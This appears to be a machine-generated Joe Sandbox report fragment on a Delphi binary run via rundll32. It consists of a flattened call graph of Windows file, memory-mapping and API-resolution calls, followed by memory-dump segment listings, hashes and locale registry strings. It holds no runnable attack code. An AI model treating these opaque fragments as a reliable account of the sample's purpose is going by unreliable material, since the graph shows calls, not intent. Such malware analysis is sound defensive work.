7f95ac 7629->7630 7819 7fb0f0 7630->7819 7633 411d20 14 API calls 7634 7f9603 7633->7634 7635 7f9633 7634->7635 7636 40ced0 TlsGetValue 7634->7636 7637 411d20 14 API calls 7635->7637 7636->7635 7638 7f965d 7637->7638 7639 411e20 14 API calls 7638->7639 7640 7f8155 7639->7640 7640->7471 7644 7f7443 7641->7644 7650 7f74f9 7641->7650 7642 40fde0 TlsGetValue 7643 7f7519 7642->7643 7643->7477 7643->7479 7644->7650 7825 44b3d0 7644->7825 7646 7f74c7 7829 44b130 7646->7829 7648 7f74ec 7649 410430 TlsGetValue 7648->7649 7649->7650 7650->7642 7652 45e65d 7651->7652 7653 45e67b 7652->7653 7654 440a70 33 API calls 7652->7654 7653->7484 7654->7653 7656 7f543f 7655->7656 7657 7f545b 7656->7657 7658 7f544a 7656->7658 7659 44afb0 35 API calls 7657->7659 7867 44afb0 7658->7867 7661 7f5455 7659->7661 7662 44b130 50 API calls 7661->7662 7663 7f54a8 7662->7663 7664 410430 TlsGetValue 7663->7664 7665 7f54b5 7664->7665 7666 40fde0 TlsGetValue 7665->7666 7667 7f54bf 7666->7667 7668 40fde0 TlsGetValue 7667->7668 7669 7f54d3 7668->7669 7670 413560 14 API calls 7669->7670 7671 7f54e6 7670->7671 7671->7499 7673 442f1a 7672->7673 7674 442f42 7673->7674 7675 442f57 7673->7675 7676 410430 TlsGetValue 7674->7676 7677 443014 7675->7677 7678 442f68 7675->7678 7716 442f52 7676->7716 7679 4104b0 TlsGetValue 7677->7679 7871 434b10 7678->7871 7682 443024 7679->7682 7681 40fec0 TlsGetValue 7684 443761 7681->7684 7685 4104b0 TlsGetValue 7682->7685 7683 442f78 7876 434b60 7683->7876 7687 413560 14 API calls 7684->7687 7691 442fe9 7685->7691 7688 443774 7687->7688 7689 40fec0 TlsGetValue 7688->7689 7690 443786 7689->7690 7690->7483 7697 443059 7691->7697 7703 44313e 7691->7703 7692 442f99 7693 442fd6 7692->7693 7694 442feb 7692->7694 7696 4104b0 TlsGetValue 7693->7696 7695 434b10 TlsGetValue 7694->7695 7695->7691 7696->7691 7698 40fde0 TlsGetValue 7697->7698 7711 443062 7698->7711 7699 4431cb 7700 4431d4 7699->7700 7701 443741 7699->7701 7704 4431f5 7700->7704 7705 44332d 7700->7705 7702 410430 TlsGetValue 7701->7702 7702->7716 7703->7699 7708 413390 18 API calls 7703->7708 7706 4113d0 TlsGetValue 7704->7706 7707 4113d0 TlsGetValue 7705->7707 7706->7716 7707->7716 7708->7703 7709 4114b0 TlsGetValue 7709->7711 7711->7709 7712 4430be 7711->7712 7711->7716 7882 411190 7711->7882 7713 448740 TlsGetValue 7712->7713 7714 4430dd 7713->7714 7715 4114b0 TlsGetValue 7714->7715 7715->7716 7716->7681 7718 57a98c 7717->7718 7719 57a97a 7717->7719 7721 57a995 7718->7721 7727 57a9a7 7718->7727 7720 410430 TlsGetValue 7719->7720 7723 57a987 7720->7723 7724 410430 TlsGetValue 7721->7724 7722 57aa00 7888 57b7e0 7722->7888 7728 40fde0 TlsGetValue 7723->7728 7724->7723 7726 57aa11 7729 57aa22 7726->7729 7735 57aa31 7726->7735 7727->7722 7731 440a70 33 API calls 7727->7731 7733 57a9d4 7727->7733 7730 57aaa5 7728->7730 7732 410430 TlsGetValue 7729->7732 7730->7497 7731->7733 7732->7723 7733->7722 7734 440a70 33 API calls 7733->7734 7734->7722 7736 57aa57 7735->7736 7737 57aa8a 7735->7737 7739 411190 TlsGetValue 7736->7739 7738 411580 TlsGetValue 7737->7738 7738->7723 7740 57aa68 7739->7740 7741 4116b0 TlsGetValue 7740->7741 7741->7723 7743 43742e 7742->7743 7895 448700 7743->7895 7747 43727f 7746->7747 7748 448740 TlsGetValue 7747->7748 7749 4372cd 7748->7749 7749->7508 7749->7509 7899 57ae50 SetLastError 7750->7899 7757 40fde0 TlsGetValue 7758 5792ce 7757->7758 7758->7508 7760 51076f 7759->7760 7761 413390 18 API calls 7760->7761 7763 5107d3 7761->7763 7762 51082d 7764 413560 14 API calls 7762->7764 7763->7762 8005 50f240 7763->8005 8008 510620 7763->8008 7765 51083e 7764->7765 7766 413560 14 API calls 7765->7766 7768 51084f 7766->7768 7768->7568 7771 411140 7770->7771 7772 436899 GetFileAttributesW 7771->7772 7773 43692d GetLastError 7772->7773 7774 4368ad 7772->7774 7778 4368bc 7773->7778 7775 4368d2 CreateFileW 7774->7775 7774->7778 7776 436915 GetLastError 7775->7776 7777 436909 CloseHandle 7775->7777 7776->7778 7777->7778 7778->7562 7780 7f46ad 7779->7780 7782 7f46e5 7780->7782 8023 43c060 7780->8023 7782->7570 7783 579f60 7782->7783 8034 57a260 7783->8034 7786 579ce0 7787 579d34 7786->7787 7790 579d3f 7786->7790 7788 4090f0 TlsGetValue 7787->7788 7788->7790 7789 579dd2 SetLastError 8094 436cd0 7789->8094 7791 4090f0 TlsGetValue 7790->7791 7794 579d77 7790->7794 7791->7794 7792 4090f0 TlsGetValue 7795 579daf 7792->7795 7794->7789 7794->7792 7795->7789 7796 579de7 7797 579e11 CreateFileW 7796->7797 7798 579e8f CloseHandle SetLastError 7797->7798 7799 579e4c SetFileTime 7797->7799 7800 409120 TlsGetValue 7798->7800 7799->7798 7801 579ea9 7800->7801 7802 409120 TlsGetValue 7801->7802 7803 579eb2 7802->7803 7804 409120 TlsGetValue 7803->7804 7805 579ebb 7804->7805 7806 579f70 7805->7806 7807 57a260 47 API calls 7806->7807 7808 579f7b 7807->7808 7808->7585 7810 57a260 47 API calls 7809->7810 7811 579f5b 7810->7811 7812 57a040 7811->7812 7813 57a058 7812->7813 8301 436de0 7813->8301 7817 411d20 14 API calls 7816->7817 7818 7f8aa4 7817->7818 7818->7575 7820 7fb10b 7819->7820 7821 440a70 33 API calls 7820->7821 7823 7fb132 7820->7823 7821->7823 7822 412220 18 API calls 7824 7f95c1 7822->7824 7823->7822 7824->7633 7826 44b3de 7825->7826 7828 44b3ec 7825->7828 7845 44bb90 7826->7845 7828->7646 7830 44b155 7829->7830 7831 44b17c 7830->7831 7832 440a70 33 API calls 7830->7832 7833 440c20 50 API calls 7831->7833 7835 44b1b0 7831->7835 7832->7831 7833->7835 7834 44b1ef 7837 44b247 7834->7837 7838 440c20 50 API calls 7834->7838 7835->7834 7836 440c20 50 API calls 7835->7836 7836->7834 7857 44a6d0 7837->7857 7838->7837 7840 44b265 7841 44b28b 7840->7841 7843 440a70 33 API calls 7840->7843 7842 4113d0 TlsGetValue 7841->7842 7844 44b29e 7842->7844 7843->7841 7844->7648 7847 44bbaa 7845->7847 7849 44b5e0 7847->7849 7848 44bbde 7848->7828 7853 44b608 7849->7853 7850 44b624 GetACP 7852 44b63f GetCPInfo 7850->7852 7851 44b632 7851->7852 7854 44b66d 7852->7854 7855 44b682 7852->7855 7853->7850 7853->7851 7856 440a70 33 API calls 7854->7856 7855->7848 7856->7855 7858 44a6de 7857->7858 7865 44a6f8 7857->7865 7861 440a70 33 API calls 7858->7861 7858->7865 7859 44a72e 7862 440c20 50 API calls 7859->7862 7863 44a764 7859->7863 7860 440c20 50 API calls 7860->7859 7861->7865 7862->7863 7864 44a7b3 7863->7864 7866 440c20 50 API calls 7863->7866 7864->7840 7865->7859 7865->7860 7866->7864 7868 44afc0 7867->7868 7869 44afda 7867->7869 7868->7869 7870 44bb90 35 API calls 7868->7870 7869->7661 7870->7869 7872 410430 TlsGetValue 7871->7872 7873 434b21 7872->7873 7874 434b2f 7873->7874 7885 4106f0 7873->7885 7874->7683 7877 434b73 7876->7877 7878 4100a0 TlsGetValue 7877->7878 7879 434b8c 7878->7879 7880 434ba2 7879->7880 7881 434b98 CharLowerBuffW 7879->7881 7880->7692 7881->7880 7883 4100a0 TlsGetValue 7882->7883 7884 4111aa 7883->7884 7884->7711 7886 410610 TlsGetValue 7885->7886 7887 4106f9 7886->7887 7887->7874 7891 57b0d0 7888->7891 7890 57b7eb 7890->7726 7892 57b0e8 7891->7892 7894 57b10f 7891->7894 7893 440a70 33 API calls 7892->7893 7892->7894 7893->7894 7894->7890 7896 44871c 7895->7896 7897 4117a0 TlsGetValue 7896->7897 7898 437442 7897->7898 7898->7496 7900 4374d0 2 API calls 7899->7900 7901 57ae7d GetLastError 7900->7901 7902 57ae86 7901->7902 7903 57aeab 7901->7903 7902->7903 7905 43ea00 3 API calls 7902->7905 7904 40fde0 TlsGetValue 7903->7904 7906 5792b2 7904->7906 7907 57ae99 7905->7907 7909 579160 7906->7909 7938 440800 7907->7938 7942 579bc0 7909->7942 7911 579180 7917 5791bc 7911->7917 7961 57aef0 7911->7961 7913 40fde0 TlsGetValue 7914 5791ce 7913->7914 7918 436a90 7914->7918 7915 57919a 7916 440a70 33 API calls 7915->7916 7915->7917 7916->7917 7917->7913 7919 436abd 7918->7919 7920 436adf 7919->7920 7921 440a70 33 API calls 7919->7921 8000 442b60 7920->8000 7921->7920 7924 4104b0 TlsGetValue 7925 436b08 7924->7925 7926 436960 4 API calls 7925->7926 7928 436b13 7926->7928 7927 40fec0 TlsGetValue 7929 436b9f 7927->7929 7931 437200 TlsGetValue 7928->7931 7932 436b2a 7928->7932 7937 436b51 7928->7937 7930 40fde0 TlsGetValue 7929->7930 7933 436ba8 7930->7933 7931->7932 7934 437200 TlsGetValue 7932->7934 7932->7937 7933->7757 7935 436b6c 7934->7935 7936 436a90 37 API calls 7935->7936 7936->7937 7937->7927 7939 44081e 7938->7939 7940 410430 TlsGetValue 7939->7940 7941 440842 7940->7941 7941->7903 7976 57a3e0 7942->7976 7944 579be7 7980 57b460 7944->7980 7947 579c09 7987 434ce0 7947->7987 7948 440a70 33 API calls 7948->7947 7951 440a70 33 API calls 7952 579c3a 7951->7952 7953 440a70 33 API calls 7952->7953 7956 579c66 7952->7956 7953->7956 7954 579c9b 7955 40fde0 TlsGetValue 7954->7955 7958 579cad 7955->7958 7956->7954 7997 579a10 7956->7997 7958->7911 7960 440a70 33 API calls 7960->7954 7962 411190 TlsGetValue 7961->7962 7963 57af35 7962->7963 7964 411190 TlsGetValue 7963->7964 7965 57af46 7964->7965 7966 411580 TlsGetValue 7965->7966 7967 57af57 7966->7967 7968 4117a0 TlsGetValue 7967->7968 7969 57b068 7968->7969 7970 57b08a 7969->7970 7971 411190 TlsGetValue 7969->7971 7972 40fec0 TlsGetValue 7970->7972 7974 57b07d 7971->7974 7973 57b09a 7972->7973 7973->7915 7975 4114b0 TlsGetValue 7974->7975 7975->7970 7977 57a3ee 7976->7977 7978 440a70 33 API calls 7977->7978 7979 57a414 7977->7979 7978->7979 7979->7944 7981 434ce0 TlsGetValue 7980->7981 7984 57b490 7981->7984 7982 40fec0 TlsGetValue 7983 579bf0 7982->7983 7983->7947 7983->7948 7985 411190 TlsGetValue 7984->7985 7986 57b4c3 7984->7986 7985->7986 7986->7982 7988 434cf9 7987->7988 7992 434d38 7988->7992 7994 434d29 7988->7994 7989 434d55 7990 40fde0 TlsGetValue 7989->7990 7993 434d36 7990->7993 7991 434d5f 7995 448740 TlsGetValue 7991->7995 7992->7989 7992->7991 7993->7951 7993->7952 7996 410430 TlsGetValue 7994->7996 7995->7993 7996->7993 7998 436960 4 API calls 7997->7998 7999 579a19 7998->7999 7999->7954 7999->7960 8001 410430 TlsGetValue 8000->8001 8002 442b70 8001->8002 8003 436afb 8002->8003 8004 4113d0 TlsGetValue 8002->8004 8003->7924 8004->8003 8011 50f260 8005->8011 8017 510640 8008->8017 8012 50f289 8011->8012 8014 440a70 33 API calls 8012->8014 8015 50f2a9 8012->8015 8013 50f251 8013->7763 8014->8015 8015->8013 8016 440a70 33 API calls 8015->8016 8016->8015 8018 510669 8017->8018 8020 440a70 33 API calls 8018->8020 8021 510689 8018->8021 8019 510631 8019->7763 8020->8021 8021->8019 8022 440a70 33 API calls 8021->8022 8022->8021 8024 43c0c1 8023->8024 8025 43c070 8023->8025 8024->7782 8025->8024 8027 43bf60 8025->8027 8030 43bed0 8027->8030 8031 43bee3 8030->8031 8032 434200 50 API calls 8031->8032 8033 43bf19 8031->8033 8032->8033 8033->8024 8035 57a3e0 33 API calls 8034->8035 8036 57a297 8035->8036 8037 57b460 TlsGetValue 8036->8037 8038 57a2a0 8037->8038 8039 57a2b9 8038->8039 8040 440a70 33 API calls 8038->8040 8041 434ce0 TlsGetValue 8039->8041 8040->8039 8042 57a2ce 8041->8042 8043 440a70 33 API calls 8042->8043 8044 57a2ea 8042->8044 8043->8044 8045 57a316 8044->8045 8046 440a70 33 API calls 8044->8046 8047 57ae50 6 API calls 8045->8047 8046->8045 8048 57a32b 8047->8048 8061 57aad0 8048->8061 8051 436960 4 API calls 8052 57a346 8051->8052 8053 57a35f 8052->8053 8054 440a70 33 API calls 8052->8054 8055 57a394 8053->8055 8091 57a070 8053->8091 8054->8053 8057 40fec0 TlsGetValue 8055->8057 8059 579f6b 8057->8059 8059->7786 8060 440a70 33 API calls 8060->8055 8062 57ab26 8061->8062 8063 40fde0 TlsGetValue 8062->8063 8064 57ab33 8063->8064 8065 434ce0 TlsGetValue 8064->8065 8066 57ab43 8065->8066 8067 4104b0 TlsGetValue 8066->8067 8068 57ab53 8067->8068 8069 411190 TlsGetValue 8068->8069 8070 57ab64 8069->8070 8071 411190 TlsGetValue 8070->8071 8072 57ab75 8071->8072 8073 411580 TlsGetValue 8072->8073 8074 57ab86 8073->8074 8075 411190 TlsGetValue 8074->8075 8083 57abe6 8074->8083 8075->8083 8076 4117a0 TlsGetValue 8077 57ad8e 8076->8077 8078 410430 TlsGetValue 8077->8078 8079 57ad9e 8078->8079 8080 40fde0 TlsGetValue 8079->8080 8081 57ada8 8080->8081 8082 40fec0 TlsGetValue 8081->8082 8084 57adb8 8082->8084 8083->8076 8085 40fde0 TlsGetValue 8084->8085 8086 57adc1 8085->8086 8087 40fde0 TlsGetValue 8086->8087 8088 57adca 8087->8088 8089 40fde0 TlsGetValue 8088->8089 8090 57a338 8089->8090 8090->8051 8092 436880 5 API calls 8091->8092 8093 57a079 8092->8093 8093->8055 8093->8060 8095 411140 8094->8095 8096 436d01 GetFileAttributesW 8095->8096 8097 436d21 8096->8097 8098 436d84 8096->8098 8112 434060 8097->8112 8099 40fec0 TlsGetValue 8098->8099 8101 436d94 8099->8101 8102 40fde0 TlsGetValue 8101->8102 8103 436d9d 8102->8103 8103->7796 8104 436d34 8104->8098 8105 436d70 8104->8105 8106 437200 TlsGetValue 8104->8106 8107 436d79 GetFileAttributesW 8105->8107 8108 436d52 8106->8108 8107->8098 8125 442b00 8108->8125 8111 411580 TlsGetValue 8111->8105 8113 43408b 8112->8113 8114 434175 8113->8114 8115 436880 5 API calls 8113->8115 8114->8104 8116 4340a1 8115->8116 8116->8114 8130 436470 8116->8130 8118 4340b5 8118->8114 8119 4340ca GetFileAttributesW 8118->8119 8119->8114 8120 4340df 8119->8120 8120->8114 8121 434115 CreateFileW 8120->8121 8121->8114 8122 434150 8121->8122 8161 433d50 8122->8161 8126 410430 TlsGetValue 8125->8126 8127 442b10 8126->8127 8128 436d5f 8127->8128 8129 4114b0 TlsGetValue 8127->8129 8128->8111 8129->8128 8131 413390 18 API calls 8130->8131 8132 4364ca 8131->8132 8133 413390 18 API calls 8132->8133 8134 4364e8 8133->8134 8135 436960 4 API calls 8134->8135 8136 4364fe 8135->8136 8137 43650d 8136->8137 8138 436880 5 API calls 8136->8138 8141 436624 8137->8141 8195 4372f0 8137->8195 8138->8137 8143 417be0 33 API calls 8141->8143 8142 442b00 TlsGetValue 8144 436532 8142->8144 8145 436634 8143->8145 8147 43653e GetVolumeInformationW 8144->8147 8146 440800 TlsGetValue 8145->8146 8152 4365e3 8146->8152 8148 43661f 8147->8148 8151 436589 GetDriveTypeW 8147->8151 8205 443d70 GetLastError 8148->8205 8151->8152 8153 40fec0 TlsGetValue 8152->8153 8154 43665e 8153->8154 8155 413560 14 API calls 8154->8155 8156 43666e 8155->8156 8157 413560 14 API calls 8156->8157 8158 43667e 8157->8158 8159 40fde0 TlsGetValue 8158->8159 8160 43668a 8159->8160 8160->8118 8162 40fde0 TlsGetValue 8161->8162 8167 433dbf 8162->8167 8163 433e67 8164 433e7d CreateFileMappingW 8163->8164 8165 433f6a 8163->8165 8164->8165 8166 433ebe MapViewOfFile 8164->8166 8168 433e5b 8165->8168 8233 433c00 8165->8233 8169 433ef1 GetCurrentProcess 8166->8169 8170 433f5d CloseHandle 8166->8170 8167->8163 8181 433e27 8167->8181 8173 40fec0 TlsGetValue 8168->8173 8230 4234a0 8169->8230 8170->8165 8176 433fe0 CloseHandle 8173->8176 8175 433f11 8178 433f50 UnmapViewOfFile 8175->8178 8180 411240 TlsGetValue 8175->8180 8176->8114 8177 410430 TlsGetValue 8179 433f96 8177->8179 8178->8170 8179->8168 8184 433aa0 TlsGetValue 8179->8184 8182 433f29 8180->8182 8183 411240 TlsGetValue 8181->8183 8185 433aa0 TlsGetValue 8182->8185 8186 433e3b 8183->8186 8188 433fb9 8184->8188 8189 433f39 8185->8189 8218 433aa0 8186->8218 8192 410430 TlsGetValue 8188->8192 8190 410430 TlsGetValue 8189->8190 8193 433f49 8190->8193 8192->8168 8193->8178 8194 410430 TlsGetValue 8194->8168 8196 437309 8195->8196 8197 437324 8196->8197 8202 437344 8196->8202 8200 4117a0 TlsGetValue 8197->8200 8198 4373f1 8199 40fde0 TlsGetValue 8198->8199 8201 436522 8199->8201 8200->8201 8201->8142 8202->8198 8203 437383 8202->8203 8204 4117a0 TlsGetValue 8203->8204 8204->8201 8208 443d90 8205->8208 8209 443e03 8208->8209 8210 443daf 8208->8210 8212 440a70 33 API calls 8209->8212 8211 43ea00 TlsGetValue FormatMessageW LocalFree 8210->8211 8213 443dc8 8211->8213 8214 443e01 8212->8214 8215 440c20 50 API calls 8213->8215 8216 40fde0 TlsGetValue 8214->8216 8215->8214 8217 443d82 8216->8217 8217->8141 8223 433ae1 8218->8223 8219 433b94 8220 40fec0 TlsGetValue 8219->8220 8221 433bc4 8220->8221 8221->8194 8222 411240 TlsGetValue 8222->8223 8223->8219 8223->8222 8224 433b41 8223->8224 8225 4111e0 TlsGetValue 8224->8225 8226 433b69 8225->8226 8227 4117a0 TlsGetValue 8226->8227 8228 433b83 8227->8228 8229 411580 TlsGetValue 8228->8229 8229->8219 8244 422f10 8230->8244 8232 4234ba 8232->8175 8234 40fde0 TlsGetValue 8233->8234 8236 433c24 8234->8236 8235 433ce7 8235->8177 8238 433c49 8236->8238 8292 4208c0 8236->8292 8238->8235 8239 4090f0 TlsGetValue 8238->8239 8241 433c98 8239->8241 8240 433cdd 8243 409120 TlsGetValue 8240->8243 8241->8240 8242 4111e0 TlsGetValue 8241->8242 8242->8240 8243->8235 8245 422f3f 8244->8245 8246 422f22 8244->8246 8245->8232 8246->8245 8247 4208c0 TlsGetValue GetProcAddress 8246->8247 8248 422f59 8247->8248 8249 4208c0 TlsGetValue GetProcAddress 8248->8249 8250 422f73 8249->8250 8251 4208c0 TlsGetValue GetProcAddress 8250->8251 8252 422f8d 8251->8252 8253 4208c0 TlsGetValue GetProcAddress 8252->8253 8254 422fa7 8253->8254 8255 4208c0 TlsGetValue GetProcAddress 8254->8255 8256 422fc1 8255->8256 8257 4208c0 TlsGetValue GetProcAddress 8256->8257 8258 422fdb 8257->8258 8259 4208c0 TlsGetValue GetProcAddress 8258->8259 8260 422ff5 8259->8260 8261 4208c0 TlsGetValue GetProcAddress 8260->8261 8262 42300f 8261->8262 8263 4208c0 TlsGetValue GetProcAddress 8262->8263 8264 423029 8263->8264 8265 4208c0 TlsGetValue GetProcAddress 8264->8265 8266 423043 8265->8266 8267 4208c0 TlsGetValue GetProcAddress 8266->8267 8268 42305d 8267->8268 8269 4208c0 TlsGetValue GetProcAddress 8268->8269 8270 423077 8269->8270 8271 4208c0 TlsGetValue GetProcAddress 8270->8271 8272 423091 8271->8272 8273 4208c0 TlsGetValue GetProcAddress 8272->8273 8274 4230ab 8273->8274 8275 4208c0 TlsGetValue GetProcAddress 8274->8275 8276 4230c5 8275->8276 8277 4208c0 TlsGetValue GetProcAddress 8276->8277 8278 4230df 8277->8278 8279 4208c0 TlsGetValue GetProcAddress 8278->8279 8280 4230f9 8279->8280 8281 4208c0 TlsGetValue GetProcAddress 8280->8281 8282 423113 8281->8282 8283 4208c0 TlsGetValue GetProcAddress 8282->8283 8284 42312d 8283->8284 8285 4208c0 TlsGetValue GetProcAddress 8284->8285 8286 423147 8285->8286 8287 4208c0 TlsGetValue GetProcAddress 8286->8287 8288 423161 8287->8288 8289 4208c0 TlsGetValue GetProcAddress 8288->8289 8290 42317b 8289->8290 8291 4208c0 TlsGetValue GetProcAddress 8290->8291 8291->8245 8293 4208ea GetProcAddress 8292->8293 8294 4208fd 8292->8294 8295 420931 8293->8295 8296 4109e0 TlsGetValue 8294->8296 8297 40fe30 TlsGetValue 8295->8297 8299 42090e 8296->8299 8298 42093b 8297->8298 8298->8238 8300 40fe30 TlsGetValue 8299->8300 8300->8295 8302 4104b0 TlsGetValue 8301->8302 8303 436e26 8302->8303 8304 436e9e 8303->8304 8305 436e38 GetFileAttributesW 8303->8305 8306 436ea7 SetFileAttributesW 8304->8306 8305->8304 8307 436e48 8305->8307 8308 436eb6 GetLastError 8306->8308 8309 436ebe 8306->8309 8310 434060 73 API calls 8307->8310 8308->8309 8311 40fec0 TlsGetValue 8309->8311 8313 436e55 8310->8313 8312 436ece 8311->8312 8312->7597 8313->8304 8314 436e91 8313->8314 8315 437200 TlsGetValue 8313->8315 8316 4104b0 TlsGetValue 8314->8316 8317 436e73 8315->8317 8316->8304 8318 442b00 TlsGetValue 8317->8318 8319 436e80 8318->8319 8320 411580 TlsGetValue 8319->8320 8320->8314 8322 7f4953 8321->8322 8323 7f496c 8322->8323 8324 440a70 33 API calls 8322->8324 8323->6985 8324->8323 8326 7f48f4 8325->8326 8327 440a70 33 API calls 8326->8327 8328 7f490d 8326->8328 8327->8328 8328->6988 8330 7f484d 8329->8330 8331 7f4883 8330->8331 8332 440a70 33 API calls 8330->8332 8333 413560 14 API calls 8331->8333 8332->8331 8334 7f48a0 8333->8334 8334->6971 8336 40ff78 Sleep 8335->8336 8336->7016 8337 417be0 8338 417c0d 8337->8338 8345 417c47 8337->8345 8339 417c17 8338->8339 8340 417c49 8338->8340 8341 413d70 33 API calls 8339->8341 8342 4111e0 TlsGetValue 8340->8342 8343 417c22 8341->8343 8342->8345 8344 4100a0 TlsGetValue 8343->8344 8344->8345

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902348846.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902399195.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902438985.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902481324.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902531426.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902559635.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902605860.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902643239.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902684882.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902724994.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902774125.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902814789.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902859612.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902903608.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902946994.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902985256.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903030581.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903074081.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903120340.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903165539.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903214850.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903303485.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903347932.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903390990.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903432269.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903480778.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903530188.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2903584442.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Open$QueryValue$CloseFileModuleName
                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                          • API String ID: 2701450724-3496071916
                          • Opcode ID: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                          • Instruction ID: 05af0d7f2029f71a10c68c1639b48ed8a0d1e1dacfaf04c10325f7dc7332685a
                          • Opcode Fuzzy Hash: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                          • Instruction Fuzzy Hash: 65610A71204BC589DB30DF71E8983DA23A5F78838CF51112A9B4D5BB5AEF78C695C348
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetUserDefaultUILanguage.KERNEL32 ref: 0041525E
                          • GetLocaleInfoW.KERNEL32 ref: 00415277
                            • Part of subcall function 00415080: FindFirstFileW.KERNEL32 ref: 004150B2
                            • Part of subcall function 00415080: FindClose.KERNEL32 ref: 004150CD
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2901144196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000F.00000002.2901086813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901144196.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901813407.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901855629.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901917379.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2901938163.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902013600.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902064071.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902165888.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902229260.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902274083.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000F.00000002.2902312251.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
